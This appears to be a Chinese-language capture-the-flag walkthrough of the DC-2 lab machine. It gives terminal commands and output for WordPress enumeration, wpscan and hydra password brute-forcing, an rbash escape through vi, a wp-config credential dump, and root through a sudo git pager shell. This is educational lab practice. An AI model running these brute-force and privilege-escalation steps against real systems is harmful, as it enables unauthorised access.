DC-2 靶机

DC-靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.124                
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-09 09:54 EDT
Nmap scan report for 192.168.56.124
Host is up (0.00039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 08:00:27:00:39:E2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

开了两个端口 80 和 7744

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,7744 192.168.56.124                             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-09 09:54 EDT
Nmap scan report for 192.168.56.124
Host is up (0.00065s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:00:39:E2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.19 seconds

80 端口重定向到了 dc-2 的域名下,需要我们将映射写入 hosts 文件。7744 是 ssh 服务,debian 操作系统

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80,7744 192.168.56.124                             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-09 09:58 EDT
Nmap scan report for dc-2 (192.168.56.124)
Host is up (0.00053s latency).

PORT     STATE SERVICE
80/tcp   open  http
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 4.7.10
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
7744/tcp open  raqmon-pdu
MAC Address: 08:00:27:00:39:E2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.03 seconds

目录爆破

漏洞脚本扫描扫出来了 wordpress,顺便目录爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ sudo dirsearch -u http://dc-2/                 
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/dc-2/-_23-07-09_10-49-19.txt

Error Log: /root/.dirsearch/logs/errors-23-07-09_10-49-19.log

Target: http://dc-2/

[10:49:19] Starting: 
[10:49:21] 403 -  290B  - /.ht_wsr.txt                                     
[10:49:21] 403 -  293B  - /.htaccess.save                                  
[10:49:21] 403 -  293B  - /.htaccess.orig
[10:49:21] 403 -  295B  - /.htaccess.sample
[10:49:21] 403 -  293B  - /.htaccess.bak1
[10:49:21] 403 -  284B  - /.html
[10:49:21] 403 -  291B  - /.htaccessBAK
[10:49:21] 403 -  291B  - /.htaccess_sc                                    
[10:49:21] 403 -  283B  - /.htm
[10:49:21] 403 -  294B  - /.htaccess_extra
[10:49:21] 403 -  291B  - /.htaccessOLD
[10:49:21] 403 -  292B  - /.htaccessOLD2
[10:49:21] 403 -  293B  - /.htaccess_orig
[10:49:21] 403 -  289B  - /.htpasswds
[10:49:21] 403 -  290B  - /.httr-oauth                                     
[10:49:21] 403 -  293B  - /.htpasswd_test                                  
[10:49:21] 403 -  283B  - /.php                                            
[10:49:21] 403 -  284B  - /.php3                                           
[10:49:41] 301 -    0B  - /index.php  ->  http://dc-2/                      
[10:49:43] 200 -   19KB - /license.txt                                      
[10:49:50] 200 -    7KB - /readme.html                                      
[10:49:51] 403 -  292B  - /server-status                                    
[10:49:51] 403 -  293B  - /server-status/
[10:49:58] 301 -  299B  - /wp-admin  ->  http://dc-2/wp-admin/              
[10:49:58] 200 -    0B  - /wp-content/                                      
[10:49:58] 301 -  301B  - /wp-content  ->  http://dc-2/wp-content/          
[10:49:58] 200 -   69B  - /wp-content/plugins/akismet/akismet.php           
[10:49:58] 500 -    0B  - /wp-content/plugins/hello.php                     
[10:49:58] 301 -  302B  - /wp-includes  ->  http://dc-2/wp-includes/        
[10:49:58] 500 -    0B  - /wp-includes/rss-functions.php                    
[10:49:58] 200 -    0B  - /wp-config.php                                    
[10:49:58] 200 -   40KB - /wp-includes/                                     
[10:49:59] 302 -    0B  - /wp-admin/  ->  http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[10:49:59] 200 -    1B  - /wp-admin/admin-ajax.php                          
[10:49:59] 200 -    2KB - /wp-login.php                                     
[10:49:59] 302 -    0B  - /wp-signup.php  ->  http://dc-2/wp-login.php?action=register
[10:49:59] 200 -    0B  - /wp-cron.php                                      
[10:49:59] 500 -    4KB - /wp-admin/setup-config.php                        
[10:49:59] 200 -    1KB - /wp-admin/install.php                             
[10:49:59] 405 -   42B  - /xmlrpc.php                                       
                                                                             
Task Completed

感觉比较有价值的有: wp-login.phpwp-content/plugins/akismet/akismet.php

wpscan 扫描

用 wpscan 收集一下用户和插件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://dc-2 -e ap,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` |  _ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://dc-2/ [192.168.56.124]
[+] Started: Sun Jul  9 10:11:35 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jul  9 10:11:40 2023
[+] Requests Done: 27
[+] Cached Requests: 37
[+] Data Sent: 7.013 KB
[+] Data Received: 178.184 KB
[+] Memory used: 254.168 MB
[+] Elapsed time: 00:00:04

得到了用户名 admin, tom, jerry,没有扫到插件,可能是没开启强力模式,先去看看 web 界面吧

flag 页面给出了提示,大意是使用 cewl 命令来构建字典,否则一般的字典是爆破不出来的,此外第二个 flag 应该是在两个或者多个用户里中的一个。

cewl 收集字典

那思路就很明显了,刚才根据 wpscan 获得了用户名列表,然后根据 cewl 构建字典,最后使用 wpscan 来爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/ > passwdlist     

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/what-we-do/ >> passwdlist

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/our-people/ >>passwdlist 

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/our-products/ >> passwdlist 

┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ cewl http://dc-2/index.php/flag/ >> passwdlist

wpscan 爆破

将可见界面的链接都放进了 passwdlist 中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ wpscan --url http://dc-2 -U user -P passwdlist 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` |  _ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://dc-2/ [192.168.56.124]
[+] Started: Sun Jul  9 10:17:34 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
Trying admin / CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/) Time: 00:00:00 <> (0 / 3585[SUCCESS] - jerry / adipiscing                                                                                      
[SUCCESS] - tom / parturient                                                                                        
Trying admin / nascetur Time: 00:02:38 <===============                        > (1605 / 3995) 40.17%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jul  9 10:20:17 2023
[+] Requests Done: 1746
[+] Cached Requests: 37
[+] Data Sent: 836.025 KB
[+] Data Received: 992.351 KB
[+] Memory used: 253.152 MB
[+] Elapsed time: 00:02:42

找到了两个正确的用户名和密码,进入 wordpress 后台的同时,尝试 ssh 登录

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ hydra -L sshuser -P sshpassswd 192.168.56.124 ssh -s 7744
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-09 11:40:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking ssh://192.168.56.124:7744/
[7744][ssh] host: 192.168.56.124   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-09 11:40:37

发现 tom 的账户可以用来 ssh 登录,而 wordpress 后台中,第二个 flag 藏在了 jerry 登录才能看到的 post 中

这个用户并不是 admin,插件也没法上传,后台是没法上传 shell 了,不过已经拿到了 ssh 登录的用户密码,也就无所谓了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ ssh tom@192.168.56.124 -p 7744
tom@192.168.56.124\'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul  9 11:47:06 2023 from 192.168.56.106
tom@DC-2:~$ whami
-rbash: whami: command not found
tom@DC-2:~$

rbash 绕过

不太清楚 rbash 是什么,搜索一下

The rbash in Linux - Understanding Restricted Bash - LinuxForDevices

简单归纳一下,实际上 rbash 是出于安全的考虑对用户可以使用的命令进行限制,尝试了几个命令,发现 cd, whoami 等被禁止了,ls 没有被禁止尝试用 ls 进行目录的读取

1
2
3
4
5
6
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ ls ./usr
bin
tom@DC-2:~$ ls ./usr/bin
less  ls  scp  vi

当前路径下有四个文件,应该是对应了用户可以使用的四个命令,尝试搜索一下 rbash escaperbash bypass

44592-linux-restricted-shell-bypass-guide.pdf (exploit-db.com) exoloit-db 中的这个 pdf 给了许多绕过的方法和思路,看了一下本质上是使用现有命令新启一个 bash,那我们可以借助于 gtfobins 中开启 shell 的方法

尝试了几个,less 的新启 shell 的方法都有点问题

1
2
3
4
tom@DC-2:~$ VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
/bin/rbash: /bin/sh: restricted: cannot specify `/' in command names
/bin/rbash: /bin/sh: restricted: cannot specify `/' in command names

我选择了使用 vi

1
2
3
vi
:set shell=/bin/sh
:shell

再就是这里如果 set shell=/bin/bash,仍然无法 bypass,以下是错误记录

1
2
3
4
5
6
whoami

[1]+  Stopped                 vi
tom@DC-2:~$ whoami
-rbash: whoami: command not found

使用 less 读取 flag3.txt

1
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

还是无法使用 cat,whoami 等命令,看一眼环境变量

1
2
$ echo $PATH
/home/tom/usr/bin

看来是因为环境变量里没有常用的程序的路径,一开始我也没想到看环境变量,我是使用绝对路径调用 python 反弹 shell 后发现 shll 依然有很多命令找不到,而在后续翻看文件夹的时候,发现 /usr/bin 里是有常用的程序的。那接下来可以把常用的一些路径放入环境变量中,我看了看 kali 中的环境变量

1
2
3
┌──(kali㉿kali)-[~/Downloads/dc_2]
└─$ echo $PATH                                          
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

按照 kali 中的环境变量将其写入靶机的环境变量中

1
2
3
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH
$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/tom/usr/bin

折腾了半天总算把 shell 完善了。尝试 sudo -l

1
2
3
$ sudo -l                           
[sudo] password for tom:                                                                                            
Sorry, user tom may not run sudo on DC-2.

信息收集与用户切换

没有权限,进入 home 目录发现还有个 jerry 用户,感觉像是在玩猫和老鼠的梗,除此之外如果仔细翻看登录后的 wordpress 后台的话,可以在用户信息里看到用户的全程就是 tom cat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ cd /home/jerry
$ ls -liah
total 28K
128057 drwxr-xr-x 2 jerry jerry 4.0K Mar 21  2019 .
  1558 drwxr-xr-x 4 root  root  4.0K Mar 21  2019 ..
140336 -rw------- 1 jerry jerry  270 Jul 10 04:47 .bash_history
128060 -rw-r--r-- 1 jerry jerry  220 Mar 21  2019 .bash_logout
128058 -rw-r--r-- 1 jerry jerry 3.5K Mar 21  2019 .bashrc
140348 -rw-r--r-- 1 jerry jerry  223 Mar 21  2019 flag4.txt
128059 -rw-r--r-- 1 jerry jerry  675 Mar 21  2019 .profile
$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

不是很能理解暗示的言外之意,一方面说没有暗示,一方面最后一句又显得很奇怪。wordpress 后台的话,应该能在 config 文件里找到数据库的密码,考虑密码碰撞或者数据库信息泄露或者 mysql 提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ cd /var/www/html
$ ls -liah
total 200K
27872 drwxr-xr-x  5 1006 1006 4.0K Mar 21  2019 .
26852 drwxr-xr-x  4 root root 4.0K Mar 21  2019 ..
32857 -rw-r--r--  1 1006 1006  418 Sep 24  2013 index.php
32860 -rw-r--r--  1 1006 1006  20K Jan 23  2018 license.txt
32859 -rw-r--r--  1 1006 1006 7.3K Oct 31  2017 readme.html
32861 -rw-r--r--  1 1006 1006 5.4K Sep 27  2016 wp-activate.php
28084 drwxr-xr-x  9 1006 1006 4.0K Apr  4  2018 wp-admin
32867 -rw-r--r--  1 1006 1006  364 Dec 19  2015 wp-blog-header.php
32856 -rw-r--r--  1 1006 1006 1.6K Aug 29  2016 wp-comments-post.php
33614 -rw-r--r--  1 root root 3.2K Mar 21  2019 wp-config.php
32862 -rw-r--r--  1 1006 1006 2.8K Dec 16  2015 wp-config-sample.php
32863 drwxr-xr-x  5 1006 1006 4.0K Apr  4  2018 wp-content
27915 -rw-r--r--  1 1006 1006 3.3K May 24  2015 wp-cron.php
32868 drwxr-xr-x 18 1006 1006  12K Apr  4  2018 wp-includes
33613 -rw-r--r--  1 1006 1006 2.4K Nov 20  2016 wp-links-opml.php
28080 -rw-r--r--  1 1006 1006 3.3K Oct 24  2016 wp-load.php
27914 -rw-r--r--  1 1006 1006  34K Apr  3  2018 wp-login.php
32866 -rw-r--r--  1 1006 1006 7.9K Jan 11  2017 wp-mail.php
32865 -rw-r--r--  1 1006 1006  16K Apr  6  2017 wp-settings.php
33612 -rw-r--r--  1 1006 1006  30K Oct 19  2016 wp-signup.php
32858 -rw-r--r--  1 1006 1006 4.5K Oct 14  2016 wp-trackback.php
28008 -rw-r--r--  1 1006 1006 3.0K Aug 31  2016 xmlrpc.php

确实有 wp-config 文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
$ cat wp-config.php
<?php
define('WP_HOME','http://dc-2');
define('WP_SITEURL','http://dc-2');

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpressdb');

/** MySQL database username */
define('DB_USER', 'wpadmin');

/** MySQL database password */
define('DB_PASSWORD', '4uTiLL');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */

define('AUTH_KEY',         ',dl5^nwxT:/et,y6K$f=q+X|nk47g=@spk<w?->-DsKODlCXNmNtmH]gA{xoBl%x');
define('SECURE_AUTH_KEY',  '!]B|&_X _{|rp 5fY6UU+fU$I6b!kvKa{r3S|xs.]:WWm>:{,?M`qq8TwKZmx T|');
define('LOGGED_IN_KEY',    'a5:jar{YEiPSA{sq[4KO-|OZk=Sp^f+3}8bZ5zAb0skMj)CAC1W}SH}vx(nU2NX]');
define('NONCE_KEY',        '7PhZ~$,c$xng{U|Kv`-%R?>T+9,|M_h!dXY}yk;|:ZX|;M:ZL|DDoUR[n)h4|NY%');
define('AUTH_SALT',        '({(<.wWSJmt|<OY@%tg(!kwk4]1U.%<wL+zA0F]ZQn|IHs%W>`Fu-FtJ~j;Fb>Zz');
define('SECURE_AUTH_SALT', '@(xD@ W~>EH7Pd^i!9(-V1)%@P[6=WQ0s6SP,otK.rKE4WWhF)?DK0wM1LOR#E|x');
define('LOGGED_IN_SALT',   'H@?@Gqd>Cfuhbr2>U4RNoVpA3{+~_`o@b,2s)uwl*|MG GB^2tx~Vrc^w60Rv`h(');
define('NONCE_SALT',       'x~|2pyiJ^j!L=dBM<S$|U/)pE1HN|{o,Yu-~[NT_VaEI7Go5uNaqNzBs1aA063a%');


/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That\'s all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define( 'WP_AUTO_UPDATE_CORE', false );

拿到 wpadmin:4uTiLL,尝试登录数据库后发现用户密码都经过了哈希,没法碰撞 admin 的密码。想 MySQL 提权的思路发现,对写入目录是有限制的,不满足提权的条件,那就只能试试密码碰撞了

使用 4uTiLL, parturient, adipiscing 尝试登录 root,均失败。

尝试登录 jerry ,adipiscing 登录成功

sudo git 提权

1
2
3
4
5
6
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

发现可以不使用密码以 root 权限运行 git 命令,正好对应了 flag4.txt 中的暗示。接着按照 gtfobins 的手法来提权

1
2
3
4
5
jerry@DC-2:~$ sudo PAGER='sh -c "exec sh 0<&1"' git -p help
sudo: sorry, you are not allowed to set the following environment variables: PAGER
jerry@DC-2:~$ sudo PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help
sudo: sorry, you are not allowed to set the following environment variables: PAGER

方法 a 失败,尝试方法 b

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
jerry@DC-2:~$ sudo git -p help config
!/bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
